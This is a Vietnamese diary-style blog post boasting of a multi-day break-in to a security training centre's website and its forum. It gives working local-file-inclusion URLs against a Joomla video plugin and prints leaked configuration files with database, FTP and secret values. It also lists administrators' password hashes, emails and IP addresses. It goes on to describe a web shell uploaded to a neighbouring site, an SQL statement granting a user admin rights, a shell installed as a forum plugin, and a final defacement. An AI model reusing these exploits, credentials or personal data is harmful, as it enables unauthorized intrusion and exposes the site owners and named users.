Phần 1:
15h30 4/5/2012 trời nắng nóng oi vãi.
Dm, hôm bữa check site nbkvl.edu.vn, mình có lên google search vài cách tấn công vào joomla. Vô tình ghé vào tuonglua.net down cái video về mà coi dell được.
Tức quá hôm nay ngồi down lại cái link vl đó. Mình phát hiện một điều thú vị
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=images/stories/videos/74.flv
Thấy gì đặc biệt hok, mình mới xem LFI gần đây, cũng chưa thực tập nhiều nữa nên hok biết rõ. Chơi nó thử xem sao.
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=../../../../index.php
=> T_T không được rùi. mình gà quá
Sorry, download unavailable or wrong file path set!Hì, không bỏ cuộc mình mò lại được link.
Please contact the administrator of this site.
Return
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=images/../index.php
Ôi trời đất ơi. WTF! i got it :)
Giờ thì là file configuration.php
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=images/../configuration.php
<?phpLàm gì nữa đây :) chưa nghĩ ra nữa, zui qúa đi thôi.
class JConfig {
var $offline = '0';
var $editor = 'fckeditor';
var $list_limit = '20';
var $helpurl = 'http://help.joomla.org';
var $debug = '0';
var $debug_lang = '0';
var $sef = '1';
var $sef_rewrite = '1';
var $sef_suffix = '1';
var $feed_limit = '10';
var $feed_email = 'author';
var $secret = 'iQpzI8w4RTloMje7';
var $gzip = '0';
var $error_reporting = '-1';
var $xmlrpc_server = '0';
var $log_path = 'Z:\\www\\tuonglua\\logs';
var $tmp_path = 'Z:\\www\\tuonglua\\tmp';
var $live_site = '';
var $force_ssl = '1';
var $offset = '7';
var $caching = '1';
var $cachetime = '15';
var $cache_handler = 'file';
var $memcache_settings = array();
var $ftp_enable = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = 'admin';
var $ftp_pass = 'tuonglua';
var $ftp_root = '';
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'adminwebsite';
var $db = 'firewallwebsite';
var $dbprefix = 'tlceh_';
var $mailer = 'mail';
var $mailfrom = 'info@tuonglua.net';
var $fromname = 'Trung Tam An Ninh Mang Firewall';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
var $MetaAuthor = '1';
var $MetaTitle = '1';
var $lifetime = '15';
var $session_handler = 'database';
var $password = 'Rth@ku$$%thE*#K()';
var $sitename = 'Trung Tam An Ninh Mang Firewall';
var $MetaDesc = 'Trung Tam An Ninh Mang Firewall';
var $MetaKeys = 'an ninh mang, anninhmang';
var $offline_message = 'This site is down for maintenance. Please check back again soon.';
}
Phần 2:
8h55 5/5/2012 Mới đi tập thể dục về, tắm xong, mát mẻ cả người
Mở máy online đọc báo trả lời email, haiz, chán. Chưa si nghĩ ra cách nào tấn công nó được hết, sao mình gà thế nhở. Ngồi thử Sqli một buổi mà không dính cái quái gì hết.phế!
Không nản chí. Mình mò zô administrator của nó. Chời, nó chơi kiểu htaccess + htpasswd. Ngon cơm rùi :D
File .htaccess trong /administrator
AuthType Basic
AuthName "EnterPassword"
AuthUserFile /var/www/vhosts/tuonglua.net/httpdocs/administrator/.htpasswd
Require valid-u
Và đây .htpasswd trong /administrator lun
heocon:$apr1$icdAS/..$WLvQtvpKj2IWF4DQXbIỐi. WTF! Lại là cái gì nữa thế. Thế thì chết con người ta à.
Lên google search thôi.
OK, tìm thấy rùi, nhưng cũng không khả quan lắm. Cú pháp như sau:
htpasswd --helpỞ đây bạn heocon sử dụng thêm option -m Force MD5 encryption of the password
Lại thêm một lần nữa chỉ để nhìn chứ không "chơi" được. Haizzzzzzzzzz
Phần 3:
22h00 7/5/2012 Trời mưa cả ngày mát mẻ cực kì luôn.
Hôm nay tâm trạng thoải mái quá. Vừa làm được một điều thú vị.
Tiếp theo đề tài bữa trước, sau vài ngày si nghĩ và tham khảo ý kiến, mình nhận ra một điều là phải local thôi,
Lên http://ip.iuvn.net/ mình tìm được khá nhiều site chung với tuonglua.net.
Hầu hết site nào cũng bị sqli. Mà điên một chỗ là tìm được thì không tìm được link admin, tìm được rùi up shell không được, chó thật :((
Trời không phụ lòng người có dã tâm. hehe
Victim tìm được www.npco.vn => thằng admin này chắc hok phải dân IT, ww.npco.vn/admin admin:123456 cái này viết bằng open source cms core gì gì đó, lỗi cũng không ít, haiz.
Up con shell lên cái coi nào (Giai đoạn này cũng chảy mồ hôi sôi nước mắt chứ hok phải giỡn đâu)
http://npco.vn/upload/multimedia/admin/2012/05/4fa7e2759e078.phpHaha, có shell rùi, connect zô sql thôi, có user/password/database rùi mà
dminwebsite|Rth@ku$$%thE*#K()|firewallwebsiteĐơn giản như đơn giản :D
| 62 | Administrator | orion | backtrackvn@yahoo.com | de0506c5de6021ab6684f376d0a46dc9:U7gkbK4FvYOBtYhZggPRxv9WsgN47lOI | Super Administrator | 0 | 1 | 25 | 2009-08-24 12:30:58 | 2012-04-24 00:48:45 | null | admin_language= language= editor= helpsite= timezone=7 |
Nếu mình không lầm thì mình cần phải có file config trong tuonglua.net/forum nữa để có thể làm admin được.
Mình đoán đúng rùi.hehe
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=images/../forum/includes/config.phpĐược cái này đây
$config['Database']['dbtype'] = 'mysql';$config['Database']['dbname'] = 'admin_forumnew';$config['MasterServer']['username'] = 'admin_forumnew';$config['MasterServer']['password'] = 'abc@123';Hơi thất vọng, mang tiếng dạy bảo mật mà sao dễ đoán thế nhỉ :D
Một vài anh admin xem chơi
| userid | usergroupid | membergroupids | displaygroupid | username | password | passworddate | styleid | parentemail | homepage | icq | aim | yahoo | msn | skype | showvbcode | showbirthday | usertitle | customtitle | joindate | daysprune | lastvisit | lastactivity | lastpost | lastpostid | posts | reputation | reputationlevelid | timezoneoffset | pmpopup | avatarid | avatarrevision | profilepicrevision | sigpicrevision | options | birthday | birthday_search | maxposts | startofweek | ipaddress | referrerid | languageid | emailstamp | threadedmode | autosubscribe | pmtotal | pmunread | salt | ipoints | infractions | warnings | infractiongroupids | infractiongroupid | adminoptions | profilevisits | friendcount | friendreqcount | vmunreadcount | vmmoderatedcount | socgroupinvitecount | socgroupreqcount | pcunreadcount | pcmoderatedcount | gmmoderatedcount | importuserid | ncode_imageresizer_mode | ncode_imageresizer_maxwidth | ncode_imageresizer_maxheight | assetposthash | fbuserid | fbjoindate | fbname | logintype | fbaccesstoken | bloggroupreqcount | showblogcss | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 277 | 6 | null | 0 | starpham | 998600cf2e22df358a3eb99d35d6726b | 2012-02-25 | dinhtruongstar@yahoo.com | 0 | null | null | null | null | null | null | null | 1 | 0 | <b><font color="#FF0000">Administrator</font></b> | 1 | 1266895980 | 0 | 1336098574 | 1336098574 | 1335406298 | 5971 | 100 | 10 | 5 | 7 | 0 | 0 | 0 | 0 | 0 | 11562327 | 08-14-1986 | 1986-08-14 | -1 | -1 | 118.68.69.198 | 0 | 2 | 0 | 0 | -1 | 1 | 0 | >1uU?J-VAIweICjJ#-]Y&^Rr|yhz& | 0 | 0 | 0 | null | 0 | 0 | 449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | null | b80bb0beb5aa5f22e61424c3a4288545 | null | 0 | null | vb | null | 0 | 1 |
| 449 | 6 | null | 0 | orion | 231eafee4df3574adbe4391ca40f5e1a | 2011-04-27 | administetua@gmail.com | 0 | null | null | null | null | null | null | null | 1 | 0 | <b><font color="#FF0000">Lionel Messi</font></b> | 1 | 1268119260 | 0 | 1299821099 | 1303909524 | 1286194027 | 0 | 22 | 10 | 5 | 7 | 0 | 0 | 0 | 0 | 0 | 11562071 | null | 0000-00-00 | -1 | -1 | 118.68.63.74 | 0 | 2 | 0 | 0 | -1 | 0 | 0 | 97{ | 0 | 0 | 0 | null | 0 | 0 | 235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | null | null | null | 0 | null | vb | null | 0 | 1 |
| 10418 | 6 | null | 0 | Namboss | 28fd26f10301d8851d02c17a06081d31 | 2011-12-13 | namhoang1991@yahoo.com.vn | 0 | null | null | null | null | null | null | null | 1 | 2 | Administrator | 0 | 1287058440 | 0 | 1336396508 | 1336404384 | 1335324952 | 0 | 3354 | 10 | 5 | 7 | 0 | 0 | 0 | 0 | 0 | 11553879 | null | 0000-00-00 | -1 | -1 | 118.68.70.1 | 0 | 2 | 0 | 0 | -1 | 0 | 0 | !2-$Z-o2xo.KQk%E{Dh7(}sJxo\9#F | 0 | 0 | 0 | null | 0 | 0 | 302 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | null | 8284490cf7740393cb308ccdb697f144 | null | 0 | null | vb | null | 0 | 1 |
| 10486 | 6 | null | 0 | Administrator | 65e428c02be308cd571c4ae413b8d54c | 2012-02-07 | hyvong.group@gmail.com | 0 | null | null | null | null | null | null | null | 2 | 0 | Administrator | 0 | 1291125720 | 0 | 1335616070 | 1335616876 | 1334214825 | 0 | 86 | 10 | 5 | 7 | 0 | 0 | 0 | 0 | 0 | 11554135 | null | 0000-00-00 | -1 | 1 | 115.75.52.182 | 0 | 0 | 0 | 0 | -1 | 0 | 0 | HktsFPtp&Ui#Qs{bD;pe!#B:J0K|Kk | 0 | 0 | 0 | null | 0 | 0 | 204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | null | af155ba3e84aecc8bed64f4e67fb9608 | null | 0 | null | vb | null | 0 | 1 |
1 tiếng rùi. Tạm nghĩ, mai làm tiếp vậy. Sáng mai còn đi tập tạ nữa :))
Phần 4 (kêt thúc):
9h45 8/8/2012 Trời mát dịu nhẹ
Vừa deface tuonglua.net xong.hihi
Show hàng nào
Tiếp tục hôm qua, mình tìm cách up shell lên tuonglua.net
Làm đủ trò trên trời dưới dất up shell via Database hoài mà hok được. Bực mình chuyển zô admincp up.
Mà mấy bạn ấy cũng không vừa. disable cái thằng Administrator có userid =1. Phải mất 1 lúc mình mới nhận ra điều này.
update user set userid=1,usergroupid=6 where username='khoaitay'Cái userid=1 là để chỉ thằng trùm có quyền thêm plugin đó.
Còn usergroupid =6 dùng để cho mình zô nhóm admin zới mấy bạn đó :D
Có quyền rùi thì login vào mà upshell thôi.
| Plugins & Products => Download/Upload Plugins => add thêm con shell xml của mình zô. |
Xong rùi đó. Chỉ cần đổi file index.php lại là xong thôi.
Đến đây là kết thúc rùi. (Đang chờ thằng admin mà kêu hoài nó dell trả lời! chán :D)
Xin chào và hẹn gặp lại trong những truyền kì khác.
